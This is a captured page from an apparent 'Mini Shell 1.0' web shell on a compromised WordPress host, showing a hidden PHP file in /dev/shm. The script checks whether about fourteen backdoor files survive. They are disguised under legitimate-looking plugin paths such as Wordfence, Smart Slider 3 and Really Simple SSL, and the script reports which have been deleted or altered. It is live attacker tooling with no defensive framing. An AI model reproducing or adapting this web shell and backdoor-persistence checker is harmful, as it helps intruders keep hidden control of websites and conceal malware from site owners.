HOME


Mini Shell 1.0
DIR: /dev/shm/
Upload File :
Current File : //dev/shm/.descriptor
<?php   $r = '/home/tamictnm/osaidigital.com'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@50566190@@initialized",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/sec.php"=>"bd@@50592262@@534",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/FormManager/Slider/gmail.php"=>"bd@@50571328@@1501",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/plesk/api-php-lib/src/Api/Struct/Session/action.validate.php"=>"bd@@50570577@@2276",
"/includest.php"=>"bd@@50561707@@675",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/Elementor/Ralationship.php"=>"bd@@50571237@@1033",
"/wp-content/plugins/seo-by-rank-math/includes/modules/content-ai/blocks/command/assets/js/xoopsconfig.php"=>"bd@@50571011@@1720",
"/wp-content/plugins/google-analytics-for-wordpress/includes/gutenberg/headline-tool/phpinsight/lib/PHPInsight/data/function.assign.php"=>"bd@@50570793@@1572",
"/wp-content/plugins/really-simple-ssl/class-multisite.php"=>"bd@@50697804@@29",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slide/EditorOverlay/global.inc.php"=>"bd@@50699907@@596",
"/wp-content/plugins/google-analytics-for-wordpress/includes/gutenberg/headline-tool/phpinsight/lib/PHPInsight/dictionaries/class.mail.php"=>"bd@@50700569@@1480",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/vkb.php"=>"bd@@50700978@@1026",
"/wp-content/plugins/ocean-extra/includes/themepanel/includes/libs/vendor/enshrined/svg-sanitize/src/Exceptions/register4.php"=>"bd@@50699118@@703",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/themeform.php"=>"bd@@50701311@@694"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');